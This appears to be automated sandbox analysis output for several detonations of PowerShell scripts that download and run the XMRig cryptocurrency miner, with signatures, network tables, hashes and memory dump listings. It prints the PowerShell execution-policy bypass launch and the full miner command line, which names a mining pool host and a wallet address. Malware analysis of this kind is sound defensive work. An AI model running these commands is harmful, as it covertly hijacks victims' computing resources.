| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3424 wrote to memory of 2108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/3424-3-0x00007FFF29783000-0x00007FFF29784000-memory.dmp
memory/3424-5-0x000002129AD00000-0x000002129AD22000-memory.dmp
memory/3424-6-0x00007FFF29780000-0x00007FFF2A16C000-memory.dmp
memory/3424-9-0x000002129AEB0000-0x000002129AF26000-memory.dmp
memory/3424-10-0x00007FFF29780000-0x00007FFF2A16C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1zw45q2m.i2w.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3424-25-0x00007FFF29780000-0x00007FFF2A16C000-memory.dmp
memory/3424-48-0x000002129AE90000-0x000002129AEA2000-memory.dmp
memory/3424-61-0x000002129AE80000-0x000002129AE8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2108-90-0x0000021A61AD0000-0x0000021A61AF0000-memory.dmp
memory/3424-91-0x00007FFF29783000-0x00007FFF29784000-memory.dmp
memory/3424-92-0x00007FFF29780000-0x00007FFF2A16C000-memory.dmp
memory/2108-93-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/3424-94-0x00007FFF29780000-0x00007FFF2A16C000-memory.dmp
memory/2108-95-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-96-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-97-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-98-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-99-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-100-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-101-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-102-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-103-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-104-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-105-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-106-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-107-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-108-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-109-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-110-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-111-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-112-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-113-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-114-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-115-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-116-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-117-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-118-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-119-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-120-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-121-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-122-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-123-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-124-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-125-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-126-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-127-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-128-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-129-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-130-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-131-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-132-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-133-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-134-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-135-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-136-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-137-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-138-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-139-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-140-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-141-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-142-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-143-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-144-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-145-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-146-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-147-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-148-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-149-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-150-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-151-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-152-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-153-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-154-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-155-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
memory/2108-156-0x00007FF6D7800000-0x00007FF6D8433000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:21
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2324 wrote to memory of 2928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2324 wrote to memory of 2928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/2324-3-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp
memory/2324-5-0x0000023AB6910000-0x0000023AB6932000-memory.dmp
memory/2324-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2324-9-0x0000023ACF0F0000-0x0000023ACF166000-memory.dmp
memory/2324-10-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_drkuklcu.jap.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2324-26-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2324-49-0x0000023ACEF20000-0x0000023ACEF32000-memory.dmp
memory/2324-62-0x0000023AB6AB0000-0x0000023AB6ABA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2928-91-0x00000239274D0000-0x00000239274F0000-memory.dmp
memory/2928-92-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2324-94-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2928-93-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2324-95-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp
memory/2324-96-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp
memory/2928-97-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-98-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-99-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-100-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-101-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-102-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-103-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-104-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-105-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-106-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-107-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-108-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-109-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-110-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-111-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-112-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-113-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-114-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-115-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-116-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-117-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-118-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-119-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-120-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-121-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-122-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-123-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-124-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-125-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-126-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-127-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-128-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-129-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-130-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-131-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-132-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-133-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-134-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-135-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-136-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-137-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-138-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-139-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-140-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-141-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-142-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-143-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-144-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-145-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-146-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-147-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-148-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-149-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-150-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-151-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-152-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-153-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-154-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-155-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-156-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
memory/2928-157-0x00007FF708190000-0x00007FF708DC3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:47
Platform
win11-20240419-en
Max time kernel
1789s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 124 wrote to memory of 4788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 124 wrote to memory of 4788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/124-0-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bzpi0jg.ipa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/124-9-0x0000017254690000-0x00000172546B2000-memory.dmp
memory/124-10-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-11-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-12-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/124-14-0x0000017254720000-0x0000017254732000-memory.dmp
memory/124-15-0x0000017254710000-0x000001725471A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4788-46-0x000002B7B2E20000-0x000002B7B2E40000-memory.dmp
memory/4788-47-0x000002B7B2E70000-0x000002B7B2E90000-memory.dmp
memory/4788-48-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/124-49-0x00007FFE6B1F3000-0x00007FFE6B1F5000-memory.dmp
memory/4788-51-0x000002B7B2E90000-0x000002B7B2EB0000-memory.dmp
memory/124-50-0x00007FFE6B1F0000-0x00007FFE6BCB2000-memory.dmp
memory/4788-52-0x000002B7B4760000-0x000002B7B4780000-memory.dmp
memory/4788-53-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-54-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-55-0x000002B7B2E90000-0x000002B7B2EB0000-memory.dmp
memory/4788-57-0x000002B7B4760000-0x000002B7B4780000-memory.dmp
memory/4788-56-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-58-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-59-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-60-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
memory/4788-61-0x00007FF75D180000-0x00007FF75DDB3000-memory.dmp
